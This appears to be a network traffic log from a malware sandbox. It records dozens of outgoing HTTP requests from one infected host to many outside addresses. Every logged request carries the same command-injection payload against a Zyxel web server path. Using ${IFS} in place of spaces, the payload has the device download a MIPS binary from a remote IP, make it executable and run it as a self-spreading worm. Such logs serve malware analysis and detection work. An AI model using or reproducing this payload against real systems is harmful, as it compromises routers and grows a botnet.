                                                Jan 12, 2024 18:15:41.923183918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                46192.168.2.235537859.208.254.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923238039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                47192.168.2.233792497.164.3.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923288107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                48192.168.2.234258069.157.223.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923371077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                49192.168.2.2337834124.14.35.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923429966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                50192.168.2.234998283.214.203.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923463106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                51192.168.2.2339966191.35.81.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923559904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                52192.168.2.235356243.163.186.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923619032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                53192.168.2.2355092144.28.70.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923662901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                54192.168.2.233523887.67.220.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923758984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                55192.168.2.2334982120.178.123.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923800945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                56192.168.2.2344722199.176.39.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923866987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                57192.168.2.2333230116.29.96.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923919916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                58192.168.2.234335688.155.84.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.923974991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                59192.168.2.2355272105.236.145.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924030066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                60192.168.2.2351522191.55.189.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924133062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                61192.168.2.2342140187.250.221.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924190998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                62192.168.2.233659282.130.6.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924256086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                63192.168.2.235459854.201.249.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924341917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                64192.168.2.2349884200.156.81.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924412966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                65192.168.2.23329725.118.53.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924451113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                66192.168.2.235671467.181.138.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924534082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                67192.168.2.2337102158.148.189.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924633026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                68192.168.2.2357624180.145.59.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924669981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                69192.168.2.235217246.93.134.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924761057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                70192.168.2.2359700192.15.84.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924832106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                71192.168.2.2354300162.46.112.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924921036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                72192.168.2.233308476.41.40.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.924973965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                73192.168.2.2333872152.3.79.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925029993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                74192.168.2.235832014.69.255.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925087929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                75192.168.2.2338208176.82.71.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925160885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                76192.168.2.234761062.1.129.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925209999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                77192.168.2.2348222178.48.215.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925278902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                78192.168.2.2349540130.253.157.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925335884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                79192.168.2.2357020190.247.186.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925405025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                80192.168.2.2339382150.120.232.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925501108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                81192.168.2.233934892.215.2.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925584078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                82192.168.2.233527285.211.172.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925676107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                83192.168.2.2343366193.43.131.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925766945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                84192.168.2.235442291.105.6.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925810099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                85192.168.2.234194491.36.0.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925892115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                86192.168.2.2336364171.113.7.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.925971031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                87192.168.2.2356890126.212.34.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926034927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                88192.168.2.2338322160.185.214.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926105976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                89192.168.2.235549868.116.182.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926153898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                90192.168.2.2340762159.163.232.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926228046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                91192.168.2.2349994112.86.137.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926260948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                92192.168.2.235894237.198.142.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926325083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                93192.168.2.2351212210.85.50.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926439047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                94192.168.2.235838893.198.153.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926440954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                95192.168.2.23401409.145.232.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926512957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                96192.168.2.2336644171.47.168.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926568031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                97192.168.2.2344482195.69.81.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926629066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                98192.168.2.235466652.188.67.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926695108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                99192.168.2.2346726195.135.219.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926776886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                100192.168.2.2342388189.133.15.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926870108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                101192.168.2.234716675.105.17.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.926929951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                102192.168.2.23541482.84.187.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927006960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                103192.168.2.235629699.46.17.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927042961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                104192.168.2.235354450.129.23.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927095890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                105192.168.2.2334160174.201.121.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927115917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                106192.168.2.2333856188.99.0.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927191973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                107192.168.2.2334940120.158.140.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:15:41.927246094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                108192.168.2.2338204130.49.168.26443
                                                TimestampBytes transferredDirectionData
